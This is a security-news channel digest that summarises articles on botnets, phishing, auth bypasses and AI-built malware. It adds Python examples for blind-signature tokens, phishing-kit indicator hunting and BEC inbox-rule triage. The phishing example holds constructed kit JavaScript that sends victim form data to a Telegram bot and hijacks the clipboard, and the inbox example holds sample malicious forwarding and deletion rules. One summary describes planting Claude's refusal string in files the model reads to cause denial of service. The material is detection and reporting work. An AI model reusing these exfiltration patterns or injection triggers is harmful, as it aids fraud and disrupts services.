Security Harvester
7.28K subscribers
20.9K photos
1 file
13.5K links
On X too! X.com/secharvesterx

Harvesting news about cyber security
How we created a blind signatures model to anonymize user API requests
https://wardblog.substack.com/p/technical-post-how-we-created-a-blind:

1. If you’re architecting a new service, think strongly about the privacy guarantees you make to users and whether you can pursue a blind signatures model.
2. We’re exploring methods such as OHTTP Relays using Cloudflare or Fastly that also will make our backend blind to the user’s network request by routing through a managed proxy service.
3. We have an exciting announcement coming soon regarding a solution that scans other Chrome extensions for detailed threats, natively integrated into the Ward platform.
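
As an added example (not code from Ward or the linked post), here is the issue-and-redeem flow a blind-signature token scheme gives you, in plain Python: the client blinds a hash of a random token, the server signs the blinded value during the authenticated request, the client unblinds it, and later redeems the token anonymously. The server can verify the token is one it issued but cannot match it to any signing request it logged. The key is a toy built from two Mersenne primes and the blinding is textbook RSA without padding; production designs use 2048-bit keys and a padded scheme such as RSABSSA (RFC 9474). The Issuer class, the double-spend set and the can_link check are constructed for illustration.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA key from two Mersenne primes so the example runs on the standard
# library alone (assumption: not the key sizes or scheme anyone should ship).
P = (1 << 127) - 1
Q = (1 << 107) - 1
N = P * Q
E = 65537
PHI = (P - 1) * (Q - 1)
D = pow(E, -1, PHI)  # private exponent; gcd(E, PHI) == 1 for these primes


def hash_to_int(token: bytes) -> int:
    """Map a token into the RSA message space (simplified full-domain hash)."""
    return int.from_bytes(hashlib.sha256(token).digest(), "big") % N


# --- client side -----------------------------------------------------------
def blind(token: bytes):
    """Return (blinded_message, blinding_factor); only the blinded value leaves the client."""
    m = hash_to_int(token)
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    blinded = (m * pow(r, E, N)) % N
    return blinded, r


def unblind(blind_sig: int, r: int) -> int:
    """Strip the blinding factor: s = s' * r^-1 mod N, a valid signature on m."""
    return (blind_sig * pow(r, -1, N)) % N


# --- server side -----------------------------------------------------------
class Issuer:
    """Signs blinded messages during the authenticated issue step and later
    verifies redeemed tokens without being able to link the two."""

    def __init__(self) -> None:
        self.issued_blinded = []   # everything the server saw at issue time
        self.redeemed = set()      # double-spend protection

    def sign_blinded(self, blinded: int) -> int:
        self.issued_blinded.append(blinded)
        return pow(blinded, D, N)

    def redeem(self, token: bytes, sig: int) -> bool:
        """Accept a token exactly once if its signature verifies under (N, E)."""
        if pow(sig, E, N) != hash_to_int(token):
            return False
        if token in self.redeemed:
            return False
        self.redeemed.add(token)
        return True

    def can_link(self, token: bytes) -> bool:
        """True if the redeemed message appears in the issuance log (it should not)."""
        return hash_to_int(token) in self.issued_blinded


def run_protocol() -> dict:
    """One issue/redeem round plus a replay and a forgery attempt."""
    issuer = Issuer()
    token = secrets.token_bytes(32)            # constructed API token
    blinded, r = blind(token)                  # client -> server: blinded value only
    sig = unblind(issuer.sign_blinded(blinded), r)
    return {
        "first_redeem": issuer.redeem(token, sig),
        "replay": issuer.redeem(token, sig),
        "forged": issuer.redeem(secrets.token_bytes(32), sig),
        "linkable": issuer.can_link(token),
    }
```

The privacy property is in the last dictionary entry: the server's issuance log holds only blinded values, so even a full dump of that log cannot tie a redeemed token back to the account that requested it. The redeemed set is what stops one token from being spent twice; without it the anonymity also buys an attacker free replay.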

@secharvester
frida-ipa-extract
https://github.com/lautarovculic/frida-ipa-extract:

1. Extract a decrypted .ipa from a jailbroken iOS device using Frida.
2. If you do not pass -f or --pid, the tool attaches to a running app.
3. If no target is provided, it will list running apps and prompt you to choose.

@secharvester
What threats are targeting European banking in January 2026?
https://threatlandscape.io/blog/active-emerging-threats-targeting-european-banking-january-2026:

1. Current threat intelligence indicates a significant surge in sophisticated, operator-driven mobile banking trojans and industrialized phishing ecosystems specifically targeting European financial institutions.
2. Infrastructure Abuse: Threat actors are increasingly using legitimate services like AWS X-Ray for covert C2 and signed UEFI shells to achieve bootkit survival, ensuring long-term access to compromised financial workstations.

@secharvester
Billion-Dollar Bait & Switch: Exploiting a Race Condition in Blockchain Infrastructure
https://mavlevin.com/2026/01/18/flashbots-mev-relay-race-condition-vulnerability:

1. I found a “digital sleight of hand” vulnerability, a race condition hidden in the milliseconds between database calls.
2. This blog post builds the technical background to understand the vulnerability, followed by my personal account finding and reporting the bug in 2023.
3. I carefully tracked the control flow from an attacker’s request through the lowest level of execution, following the memory moving between structs and functions.

@secharvester
Google Meet Reactions: Reverse Engineering the WebRTC Channel for Emoji
https://www.agilesoftwaredevelopment.com/en/posts/google-meet-reactions-webrtc/:

1. But Google Meet is heavily obfuscated with class names like .b1bzTb or .VfPpkd-rymPhb, and hunting for the full emoji list in popup depths didn’t seem like a great idea.
2. Then I opened chrome://webrtc-internals during a call and spotted something interesting: among dozens of RTCDataChannels, there’s one named “reactions” — and it turns out emoji are sent through it.
3. If the meeting is created from a personal Gmail account, only the standard 9 emoji are available and the extension doesn’t add much value.

@secharvester
Kimwolf Botnet Lurking in Corporate, Govt. Networks
https://krebsonsecurity.com/2026/01/kimwolf-botnet-lurking-in-corporate-govt-networks/:

1. A new Internet-of-Things (IoT) botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic.
2. The malware that turns one’s Internet connection into a proxy node is often quietly bundled with various mobile apps and games, and it typically forces the infected device to relay malicious and abusive traffic — including ad fraud, account takeover attempts, and mass content-scraping.
3. Next week, we’ll shed light on the myriad China-based individuals and companies connected to the Badbox 2.0 botnet, the collective name given to a vast number of Android TV streaming box models that ship with no discernible security or authentication built-in, a...

@secharvester
This open-source Windows XP alternative finally gets a much-awaited speed boost
https://www.xda-developers.com/open-source-windows-alternative-gets-the-much-awaited-speed-boost/:

1. You can go back to an old version of Windows, preferably one that still supports the ESU program, to keep your PC immune to changes Microsoft is making.
2. In his recent review of ReactOS, our Lead Windows Editor, João Carrasqueira, while acknowledging that the open-source alternative has been getting better every year, shared his experience about how it's still not good enough for something as simple as web browsing.
3. We haven't tested it, but the official X handle of ReactOS has claimed "substantial performance improvements" in networking apps after the latest code-merger.

@secharvester
VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun - Check Point Research
https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/:

1. Employing technologies like eBPF and LKM rootkits and dedicated modules for cloud enumeration and post-exploitation in container environments, this unusual piece of malware seemed to be a larger development effort by an advanced actor.
2. It remains unclear whether this approach was purely pragmatic, intended to make the process more efficient, or a deliberate “jailbreak” strategy to navigate guardrails early and enable full end-to-end malware development later.
3. Written in Chinese and saved as Markdown (MD) files, the documentation bears all the hallmarks of a Large Language Model (LLM): highly structured, consistently formatted, and exceptionally detailed.

@secharvester
Fake PNB MetLife payment pages abusing UPI & Telegram bots
https://malwr-analysis.com/2026/01/21/fake-pnb-metlife-payment-gateway-page-stealing-customer-details-and-redirecting-victims-to-upi-payments/:

1. While actively hunting for phishing sites, I came across multiple web pages impersonating PNB MetLife Insurance and presenting themselves as official policy premium payment gateways.
2. Clicking these buttons triggers JavaScript that silently copies the attacker-controlled UPI ID to the clipboard and then redirects the victim to a payment app deep link.
3. URLScan analysis shows multiple deployments of the same phishing kit, with identical client-side JavaScript logic and minor configuration changes such as UPI IDs, Telegram bots, and subdomain names.
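
The two behaviours the write-up calls out, a clipboard write of the attacker's VPA followed by a upi:// deep link, and many deployments that share logic but differ only in configuration literals, are both cheap to hunt for statically. The following is an added example, not the author's tooling: it pulls VPAs and Telegram bot tokens out of a page's script, flags the clipboard-then-redirect pattern, and fingerprints the kit by hashing the script with string and numeric literals normalized away, so deployments that differ only in UPI ID, bot token and chat id hash the same. The two sample pages are constructed to resemble the described kit; the regular expressions are heuristics (the VPA pattern also matches ordinary e-mail addresses), and renamed identifiers or minification would defeat the fingerprint.

```python
import hashlib
import re

# Constructed pages modelled on the described kit: identical logic, different config.
SAMPLE_A = """<script>
var UPI_ID = "merchant.pay@okaxis";
var BOT = "https://api.telegram.org/bot1234567890:AAFakeTokenFakeTokenFakeTokenFakeTok/sendMessage";
function payNow(amount) {
  fetch(BOT + "?chat_id=111222333&text=" + encodeURIComponent(document.getElementById("policy").value));
  navigator.clipboard.writeText(UPI_ID);
  window.location.href = "upi://pay?pa=" + UPI_ID + "&pn=PNB%20MetLife&am=" + amount + "&cu=INR";
}
</script>"""

SAMPLE_B = """<script>
var UPI_ID = "premium.collect@ybl";
var BOT = "https://api.telegram.org/bot9876543210:AAOtherFakeTokenOtherFakeTokenOther/sendMessage";
function payNow(amount) {
  fetch(BOT + "?chat_id=444555666&text=" + encodeURIComponent(document.getElementById("policy").value));
  navigator.clipboard.writeText(UPI_ID);
  window.location.href = "upi://pay?pa=" + UPI_ID + "&pn=PNB%20MetLife&am=" + amount + "&cu=INR";
}
</script>"""

STRING_LIT = re.compile(r"""(["'])(?:\\.|(?!\1).)*\1""")   # JS string literal
NUMBER = re.compile(r"\d+")
VPA = re.compile(r"\b[A-Za-z0-9._-]{2,}@[A-Za-z]{2,}\b")   # heuristic; also matches e-mail
TG_BOT = re.compile(r"api\.telegram\.org/bot(\d{8,10}:[A-Za-z0-9_-]{30,})")
CLIPBOARD = re.compile(r"clipboard\.writeText\s*\(")
UPI_REDIRECT = re.compile(r"location(?:\.href)?\s*=\s*[^;]*upi://")


def extract_iocs(page: str) -> dict:
    """Configuration indicators plus the clipboard-hijack behaviour from page source."""
    return {
        "upi_ids": sorted(set(VPA.findall(page))),
        "telegram_bots": sorted(set(TG_BOT.findall(page))),
        "clipboard_hijack": bool(CLIPBOARD.search(page) and UPI_REDIRECT.search(page)),
    }


def kit_fingerprint(page: str) -> str:
    """Hash the script with literals normalized so config-only changes collapse to one kit id."""
    norm = STRING_LIT.sub('"S"', page)
    norm = NUMBER.sub("0", norm)
    norm = re.sub(r"\s+", " ", norm).strip()
    return hashlib.sha256(norm.encode()).hexdigest()[:16]


def cluster(pages: dict) -> dict:
    """Group deployments by kit fingerprint: {fingerprint: [(label, iocs), ...]}."""
    groups = {}
    for label, page in pages.items():
        groups.setdefault(kit_fingerprint(page), []).append((label, extract_iocs(page)))
    return groups
```

Run cluster() over the script bodies pulled from a URLScan result set and each fingerprint becomes one kit with its list of VPAs and bot tokens to report to the PSP and to Telegram. The bot token is the more valuable indicator: it identifies the operator's collection channel regardless of which subdomain or UPI ID a given deployment uses.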

@secharvester
AI Supercharges Attacks in Cybercrime's New 'Fifth Wave'
https://www.infosecurity-magazine.com/news/ai-supercharges-attacks-cybercrime/:

1. In its latest report, published on January 20, the Singapore-based cybersecurity firm divided the history of cybercrime into four phases, from the opportunistic malware and viruses of the 1990s and early 2000s to the “ecosystem and supply chain attacks” wave that marked the 2010s and 2020s.
2. Finally, Group-IB analysts also found that threat actors are moving past chatbot misuse and are creating proprietary “dark large language models” (LLMs) that are more stable, capable and have no ethical restrictions.
3. From early experiments of rudimentary, open-access dark LLMs like WormGPT, these tools have now evolved into custom-built, self-hosted AI models optimized for generating harmful content, including malware, scams and disinformation.

@secharvester
Forwarded from Хакер — Xakep.RU
Xakep reader meetup to be held in Almaty on January 29

On January 29, 2026 at 19:00 a meetup of Xakep readers will be held in Almaty, timed to coincide with the unblocking of Xakep.ru in Kazakhstan. The offline meetup will feature the editor-in-chief of Xakep as well as two speakers from the Black Ice hackerspace.

https://xakep.ru/2026/01/21/almaty-meetup-jan/
Infostealers are being used to create legitimate samples resembling a full-blown data breach, resulting in a PR nightmare for companies
https://www.infostealers.com/article/pccomponentes-breach-how-infostealer-logs-enable-convincing-credential-stuffing/:

1. A recent cybersecurity incident involving the major Spanish electronics retailer Pccomponentes highlights a growing trend in the cybercrime ecosystem: the weaponization of infostealer logs to stage convincing “fake breaches” that cause massive PR headaches.
2. The provided sample contained legitimate, sensitive customer information, which naturally led to widespread concern among users and media outlets.
3. Note that while we have blurred the specific PII, the variety of data exposed is critical: This incident serves as a stark reminder that threat actors do not need to exploit zer...

@secharvester
Break LLM Workflows with Claude's Refusal Magic String
https://hackingthe.cloud/ai-llm/exploitation/claude_magic_string_denial_of_service/:

1. Article by Nick Frichette. Anthropic documents a "magic string" that intentionally triggers a streaming refusal.
2. To see this in action, we can place the magic string in a file that Claude will consume and watch it immediately bail out. This behavior creates a low-cost denial of service on any Claude-backed feature that does not robustly handle refusals or context resets.
3. Treat it like any other injection trigger: defend the input surface, handle refusals explicitly, and reset poisoned context so a single string can't become a persistent denial of service.

@secharvester
Mirage - an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents
https://github.com/DedInc/mirage:

1. Mirage is an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents.

@secharvester
You Got Phished? Of Course! You're Human...
https://www.bleepingcomputer.com/news/security/you-got-phished-of-course-youre-human/:

1. Flare researchers analyzed 8,627 underground and semi-underground conversations that showed how phishing has evolved into a mature service economy, where attackers no longer rely on crude fake pages or luck.
2. These AI capabilities allow attackers to automatically generate tailored lures, adapt in real time to victim responses, and mi...

@secharvester
capa in the browser - fully local static analysis to detect binary capabilities and behaviors
https://surfactant.readthedocs.io/en/latest/capa/:

1. Run capa purely in your browser using Pyodide (WebAssembly).
2. Supports PE, ELF, .NET modules, and shellcode (x86/x64 only).

@secharvester
Fortinet admins report patched FortiGate firewalls getting hacked
https://www.bleepingcomputer.com/news/security/fortinet-admins-report-patched-fortigate-firewalls-getting-hacked/:

1. Until Fortinet provides a fully patched FortiOS release, admins are advised to temporarily disable the vulnerable FortiCloud login feature (if enabled) to secure their systems against attacks.
2. CISA has also added the CVE-2025-59718 FortiCloud SSO auth bypass flaw to its list of actively exploited vulnerabilities, ordering federal agencies to patch within a week.

@secharvester
Third-party identity verification provider breach exposes government ID images (Total Wireless / Veriff)
https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/d711bedf-6bbc-45cc-b333-62e961653bd7.html:


@secharvester
Attackers With Decompilers Strike Again (SmarterTools SmarterMail WT-2026-0001 Auth Bypass) - watchTowr Labs
https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/:

1. You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV hall-of-famers.
2. We decided to continue poking at what looked like a fairly interesting solution and quickly stumbled into WT-2026-0001 - an Authentication Bypass vulnerability, allowing any user to reset the SmarterMail system administrator password.
3. Within the release notes, you’ll see a clear, succinct, and well-communicated emergency message (possibly in red, but we’re colour blind, so we’re not sure): We did not plan to publish this blog post today - Wednesdays are meme days - but that changed when an ano...

@secharvester
Resurgence of a multi‑stage AiTM phishing and BEC campaign abusing SharePoint | Microsoft Security Blog
https://aka.ms/aitm-bec:

1. The campaign abused SharePoint file‑sharing services to deliver phishing payloads and relied on inbox rule creation to maintain persistence and evade user awareness.
2. To further protect themselves from similar attacks, organizations should also consider complementing MFA with conditional access policies, where sign-in requests are evaluated using additional identity-driven signals like user or group membership, IP location information, and device status, among others.
3. Additionally, even if the compromised user’s password is reset and sessions are revoked, the attacker can set up persistence methods to sign-in in a controlled manner by tampering with MFA.
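
Inbox rules are the persistence mechanism named above, and they are cheap to audit. The following added example (not Microsoft's code) scores a mailbox's rules the way a responder triages them after an AiTM alert: forwarding or redirecting to external domains, hiding mail by deleting it or moving it to sink folders such as RSS Feeds while marking it read, keyword conditions on payment or security-alert terms, and near-empty rule names. The rule dicts are constructed in a flattened form of the Microsoft Graph messageRule shape, with folder ids already resolved to display names and recipients reduced to addresses; ORG_DOMAINS, the folder list, the keyword list and the weights are assumptions to tune per tenant.

```python
# Tenant-specific assumptions; tune per environment.
ORG_DOMAINS = {"contoso.example"}
SINK_FOLDERS = {"rss feeds", "rss subscriptions", "archive", "conversation history",
                "junk email", "deleted items", "notes"}
BEC_KEYWORDS = {"invoice", "payment", "wire", "remittance", "bank", "hacked",
                "phish", "suspicious", "password", "security alert", "helpdesk"}

# Constructed rules in a flattened Graph messageRule shape (folder ids resolved to names).
SAMPLE_RULES = [
    {"displayName": "Newsletters", "isEnabled": True,
     "conditions": {"senderContains": ["news@vendor.example"]},
     "actions": {"moveToFolderName": "Newsletters", "markAsRead": False}},
    {"displayName": ".", "isEnabled": True,
     "conditions": {"subjectContains": ["invoice", "payment", "hacked"]},
     "actions": {"moveToFolderName": "RSS Subscriptions", "markAsRead": True,
                 "stopProcessingRules": True}},
    {"displayName": "Backup", "isEnabled": True,
     "conditions": {},
     "actions": {"forwardTo": ["mailbox.backup9921@webmail.example"], "delete": True}},
]


def external_recipients(addresses, org_domains=ORG_DOMAINS):
    """Addresses whose domain is not one of the tenant's own."""
    return [a for a in addresses if a.rsplit("@", 1)[-1].lower() not in org_domains]


def score_rule(rule, org_domains=ORG_DOMAINS):
    """Return (score, reasons) for one inbox rule; higher means more BEC-like."""
    actions = rule.get("actions", {})
    conds = rule.get("conditions", {})
    score, reasons = 0, []

    ext = external_recipients(actions.get("forwardTo", []) + actions.get("redirectTo", []),
                              org_domains)
    if ext:
        score += 5
        reasons.append("forwards/redirects to external: " + ", ".join(ext))

    folder = actions.get("moveToFolderName", "").lower()
    hides = bool(actions.get("delete")) or folder in SINK_FOLDERS
    if hides:
        score += 3
        reasons.append("hides mail via " + ("delete" if actions.get("delete") else folder))
        if actions.get("markAsRead"):
            score += 1
            reasons.append("marks hidden mail as read")
        if not conds:
            score += 2
            reasons.append("catch-all: no conditions")

    terms = conds.get("subjectContains", []) + conds.get("bodyContains", [])
    hits = sorted({t for t in terms if any(k in t.lower() for k in BEC_KEYWORDS)})
    if hits:
        score += 2
        reasons.append("BEC keywords: " + ", ".join(hits))

    if len(rule.get("displayName", "").strip()) <= 2:
        score += 2
        reasons.append("near-empty rule name")

    return score, reasons


def hunt(rules, threshold=4, org_domains=ORG_DOMAINS):
    """Enabled rules at or above threshold, most suspicious first."""
    findings = []
    for rule in rules:
        if not rule.get("isEnabled", True):
            continue
        score, reasons = score_rule(rule, org_domains)
        if score >= threshold:
            findings.append({"name": rule.get("displayName", ""),
                             "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: f["score"], reverse=True)
```

Feed hunt() the rules of every mailbox that shows an AiTM sign-in and treat anything that scores as part of the same incident as the session theft: remove the rule, then check for the MFA tampering the post mentions, since a password reset alone leaves both in place.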

@secharvester